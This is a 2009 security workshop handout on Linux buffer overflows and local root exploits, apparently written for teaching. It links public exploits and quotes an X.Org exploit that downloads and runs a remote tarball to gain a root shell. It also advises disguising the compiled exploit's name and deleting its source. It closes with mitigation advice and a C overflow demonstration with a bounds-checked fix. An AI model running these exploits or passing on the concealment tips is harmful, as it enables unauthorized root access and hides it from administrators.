Buffer Overflows 101

Good List (from the Backtrack3 Web Archives):
http://milw0rm.com/platforms/linux

Practical Examples:

1) Linux kernel exploits

http://milw0rm.com/exploits/2031
Affects kernels >= 2.6.13 and < 2.6.17.4

This is just one of many publicly available local privilege-escalation exploits for Linux. Note that not every entry in this list is a classic buffer overflow (the X.Org exploit under 4), for example, gets root by making a setuid X server load an attacker-built module), but they are all built and run the same way, and each of them turns an unprivileged shell into root:

2) Snort

http://milw0rm.com/exploits/3609

3) MySQL

http://milw0rm.com/exploits/1518

4) Known Ubuntu 8.10 overflows:

Kernel advisory: http://news.softpedia.com/news/Linux-Kernel-Vulnerability-in-Ubuntu-8-10-Update-Today-97543.shtml

Exploit file from http://milw0rm.com/exploits/1596 (this is the 2006 X.Org module-path exploit described in the advisory quoted below, not the kernel bug in the news item above):
--------------------------------------------------------------------------------
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.

# The rest is H D Moore from metasploit

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz

# milw0rm.com [2006-03-20]

---------------------------------end original example-------------------------------

REMEMBER!  All scripts are disabled and obfuscated so they are only available to those who are intelligent enough to also be ETHICAL.  If you are too clueless to use this script, you are not clueful enough to stay out of trouble (jail, $myservers, schools, .edu, .gov, etc.).  So if you can't read and comment that script, you can't run it.
  
General C How To:


You will need to copy the code to the server of choice.  Cut and paste will work, unless you are coming from a Windows system (beware of CRLF line endings, the glowing ^M's: they break the #! line of shell scripts such as root.sh, so run dos2unix on anything pasted from Windows).  We are going to copy it to a filename.c that obfuscates its true function, like testfile.c, and compile it to something like "grepfile", as a real $badguy would.

Once you have the source code on the test server in our practical example, you are going to need to compile it.

$ gcc -o grepfile test.c

If your file is named test.c, '-o grepfile' tells gcc to name the executable grepfile. If instead you type

$ gcc test.c

you get an executable called a.out in the same directory as the source file. That is gcc's default output name, and it is overwritten every time you compile another program in the same directory, so always override it with -o followed by the name you want:

$ gcc -o grepfile2 test2.c

creates an executable named grepfile2 from the source file test2.c.

Running the executable you created is as simple as typing the following at the prompt.

$ ./grepfile
OR
$ ./grepfile2

It is a good idea to remove the .c source after building so the directory looks innocent, as a real $badguy's would.

If the exploit works, you should have a root shell (the MySQL example instead gives you root privileges inside MySQL).

I was able to run the MySQL example on the December HackFest Fedora Core 10 system successfully to obtain root MySQL privileges (build instructions are in the script).

I was also able to run the X11 script.  Be careful - it will restart X on Red Hat or FC 10!  It works on unpatched Ubuntu 8.10!


All you need to run these local exploits is "access": an unprivileged shell on the box, however you got it. None of them require root to start with; that is what they deliver.



Mitigating Buffer Overflows


1) Remove gcc, cc and gdb from production systems. This only raises the bar: an attacker can compile on an identical box and upload a static binary, so treat it as hygiene, not a control.
2) Be sure the running kernel's overflow protections are on: /proc/sys/kernel/randomize_va_space should be 2 (full address-space randomization), and on Red Hat/Fedora kernels /proc/sys/kernel/exec-shield should be 1.
3) NX (no-execute) stack and heap: x86-64 and PAE kernels use the CPU's NX bit (look for "nx" in /proc/cpuinfo and "NX (Execute Disable) protection: active" in dmesg); older 32-bit kernels need a patch such as Exec Shield or PaX. Know your kernel version's vulnerabilities, because none of this stops a bug in the kernel itself like item 1 above.
4) SSH from outside off; internal trust and access severely limited, since every exploit on this page starts from a shell.
5) Patch. Both the kernel bug and the X.Org bug above were fixed upstream in 2006, years before this HackFest. For your own code, build with -fstack-protector (stack canaries) and -O2 -D_FORTIFY_SOURCE=2 (bounds-checked str*/mem* calls), which turn many overflows into a clean abort instead of a root shell.
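What every exploit above relies on, stripped to its core, as an added example that is not from this handout or from any of the linked exploits: a fixed-size buffer with a privilege flag right after it in memory, an unchecked copy that runs past the buffer into the flag, and the bounds-checked copy that stops it. The struct and function names (struct session, set_name_unchecked, set_name_checked, demo) and the inputs are this example's own. Real exploits overwrite a saved return address or a function pointer instead of a flag, which is what the NX and kernel protections above are aimed at, but the mechanism is the same one shown here.

```c
/*
 * Added example (not from the original handout or the linked exploits).
 * A 16-byte name buffer sits directly in front of an int privilege flag.
 * Copying a 17-byte name without a length check writes the 17th byte
 * into is_admin, exactly as strcpy(s->name, src) would.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

/* Constructed inputs: 16 'A's followed by 'B'; the 'B' lands in is_admin. */
#define OVERFLOW_INPUT "AAAA" "AAAA" "AAAA" "AAAA" "B"

struct session {
    char name[NAME_LEN];   /* offset 0, 16 bytes, no padding after it */
    int  is_admin;         /* offset 16: the very next bytes in memory */
};

/*
 * Vulnerable: copies until the NUL with no regard for the size of name.
 * It is written as a byte loop through a pointer to the whole struct so
 * that the demonstration is well-defined C and is not intercepted by a
 * fortified strcpy; the caller keeps src shorter than the struct itself.
 */
void set_name_unchecked(struct session *s, const char *src)
{
    unsigned char *dst = (unsigned char *)s + offsetof(struct session, name);
    while (*src)
        *dst++ = (unsigned char)*src++;
    *dst = '\0';
}

/* Fixed: refuse anything that does not fit together with its terminator.
 * Returns 0 on success, -1 if src is too long (s is left untouched). */
int set_name_checked(struct session *s, const char *src)
{
    size_t n = 0;
    while (n < NAME_LEN && src[n] != '\0')
        n++;
    if (n == NAME_LEN)          /* 16 or more characters: no room for NUL */
        return -1;
    memcpy(s->name, src, n + 1);
    return 0;
}

/* Run one input through either setter on a fresh, unprivileged session and
 * return the resulting is_admin (0 = still unprivileged, nonzero = owned).
 * Returns -1 if the input would run past the struct, which this demo
 * deliberately does not do. */
int demo(const char *input, int checked)
{
    struct session s;
    memset(&s, 0, sizeof s);
    if (checked) {
        if (set_name_checked(&s, input) != 0)
            return 0;           /* rejected, flag never touched */
    } else {
        if (strlen(input) + 1 > sizeof s)
            return -1;          /* keep the overflow inside the object */
        set_name_unchecked(&s, input);
    }
    return s.is_admin;          /* any nonzero value passes if (s.is_admin) */
}

int main(void)
{
    printf("unchecked, \"alice\"     : is_admin=%d\n", demo("alice", 0));
    printf("unchecked, 16 A's + B  : is_admin=%d\n", demo(OVERFLOW_INPUT, 0));
    printf("checked,   16 A's + B  : is_admin=%d\n", demo(OVERFLOW_INPUT, 1));
    return 0;
}
```

The flag ends up as the byte value of 'B' on little-endian machines (66), which is all an `if (s.is_admin)` check needs; the checked setter returns -1 and leaves the struct as it was. The compiler flags in item 5 catch the `strcpy` form of this bug at runtime, which is why the example avoids it.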


www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  (503)754-4452

January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux BT3] Pill and leave the InSecurity Matrix, or take the Blue MS Pill and stay happily ignorant.